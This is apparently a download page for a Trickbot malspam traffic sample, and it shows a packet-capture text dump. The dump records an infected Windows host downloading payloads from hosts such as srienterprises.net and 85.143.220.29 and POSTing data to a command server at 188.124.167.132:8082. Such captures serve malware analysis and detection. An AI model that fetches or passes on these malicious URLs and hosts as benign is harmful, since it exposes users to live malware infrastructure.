Text Example

Malspam Campaign Delivers Trickbot Malware PCAP file Download Traffic Sample

Download Attachments

  • 1 pcap 24
    Date added: May 24, 2019 12:02 am Added by: admin File size: 9 MB Downloads: 13

2018-06-29 12:54:14.644477 IP 172.16.1.102.49198 > 134.119.189.10.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75: HTTP: GET /lop.bin HTTP/1.1
E..s..@……..f.w.
…P\WQ..M^PP…-…GET /lop.bin HTTP/1.1
Host: srienterprises.net
Connection: Keep-Alive

2018-06-29 12:54:14.644487 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [.], ack 76, win 64240, length 0
E..(………w.
…f.P…M^P\WQ.P…l………
2018-06-29 12:54:14.844854 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [P.], seq 1:2741, ack 76, win 64240, length 2740: HTTP: HTTP/1.1 200 OK
E.

…….$..w.

2018-06-29 12:55:45.742934 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [.], ack 1, win 64240, length 0
E..(..@….H…f.#.@.3.P.Fr.X.1.P….o……..
2018-06-29 12:55:45.743083 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [P.], seq 1:140, ack 1, win 64240, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…..@……..f.#.@.3.P.Fr.X.1.P…5…GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: /
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2018-06-29 12:55:45.743140 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [.], ack 140, win 64240, length 0
E..(.w…..~.#.@…f.P.3X.1..FsLP………….
2018-06-29 12:55:45.804452 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [P.], seq 1:1219, ack 140, win 64240, length 1218: HTTP: HTTP/1.1 200 OK

E….x…….#.@…f.P.3X.1..FsLP…\W..HTTP/1.1 200 OK

2018-06-29 12:55:46.005784 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [.], ack 1, win 64240, length 0
E..(..@…w….f…..4.P.UsR.L.4P…h………
2018-06-29 12:55:46.005788 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
E…..@…v….f…..4.P.UsR.L.4P…….GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: /
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

2018-06-29 12:55:46.005788 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [.], ack 218, win 64240, length 0
E..(.|………….f.P.4.L.4.Ut+P…g………

2018-06-29 12:55:46.064711 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [P.], seq 1:1371, ack 218, win 64240, length 1370: HTTP: HTTP/1.1 200 OK

2018-06-29 12:57:48.184025 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..( =@….p…fU….8.P#.k9.Q,.P………….
2018-06-29 12:57:48.184275 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147: HTTP: GET /table.png HTTP/1.1
E… >@……..fU….8.P#.k9.Q,.P…….GET /table.png HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: 85.143.220.29

2018-06-29 12:57:48.184329 IP 85.143.220.29.80 > 172.16.1.102.49208: Flags [.], ack 148, win 64240, length 0
E..()+….2.U……f.P.8.Q,.#.k.P….*……..

2018-06-29 12:57:48.278295 IP 172.16.1.102.138 > 172.16.1.255.138: NBT UDP PACKET(138)

2018-06-29 12:58:08.163467 IP 172.16.1.8.445 > 172.16.1.102.49476: Flags [R.], seq 28547, ack 540206, win 0, length 0
E..(B.@…]……..f…Ds7T.f ..P………….
2018-06-29 12:58:08.854164 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 148:295, ack 385267, win 64240, length 147: HTTP: GET /toler.png HTTP/1.1
E….N@……..fU….8.P#.k..W..P…./..GET /toler.png HTTP/1.1
Cache-Control: no-cache

2018-06-29 12:58:08.854312 IP 172.16.1.102.49205 > 185.231.154.104.443: Flags [P.], seq 35002:35407, ack 104145, win 62791, length 405

E..(..@….H…f.|…J....M....P...Q......... 2018-06-29 12:58:17.086787 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [P.], seq 1:231, ack 1, win 64240, length 230 E.....@....a...f.|...J....M….P….!..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4701
Cache-Control: no-cache

2018-06-29 12:58:17.086832 IP 188.124.167.132.8082 > 172.16.1.102.49482: Flags [.], ack 231, win 64240, length 0
E..(+……..|…..f…J….`..3P…P+……..

2018-06-29 12:58:17.086835 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [.], seq 231:1691, ack 1, win 64240, length 1460

2018-06-29 12:58:26.662877 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..(.z@… 3…fU….x.Py….Q..P………….
2018-06-29 12:58:26.663148 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [P.], seq 1:75, ack 1, win 64240, length 74: HTTP: GET /worming.png HTTP/1.1
E..r.{@……..fU….x.Py….Q..P…w…GET /worming.png HTTP/1.1
Connection: Keep-Alive
Host: 85.143.220.29

2018-06-29 13:00:42.880606 IP 172.16.1.102.49532 > 188.124.167.132.8082: Flags [P.], seq 1:312, ack 1, win 64240, length 311
E.._..@……..f.|…|..c.~….;P…-a..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/ HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———WMGTRKAJOYFBWHYO
Content-Length: 274

2018-06-29 13:00:42.880689 IP 188.124.167.132.8082 > 172.16.1.102.49532: Flags [.], ack 312, win 64240, length 0

E..(………|…..f…|…;c…P…-………

E..(..@……..f.|…}…W.Z….P…h………
2018-06-29 13:00:43.803141 IP 172.16.1.102.49533 > 188.124.167.132.8082: Flags [P.], seq 1:313, ack 1, win 64240, length 312
E..`..@….v…f.|…}…W.Z….P…I…POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/82/ HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———OUYLMXQCWCVFOBNR
Content-Length: 2229

Leave a Reply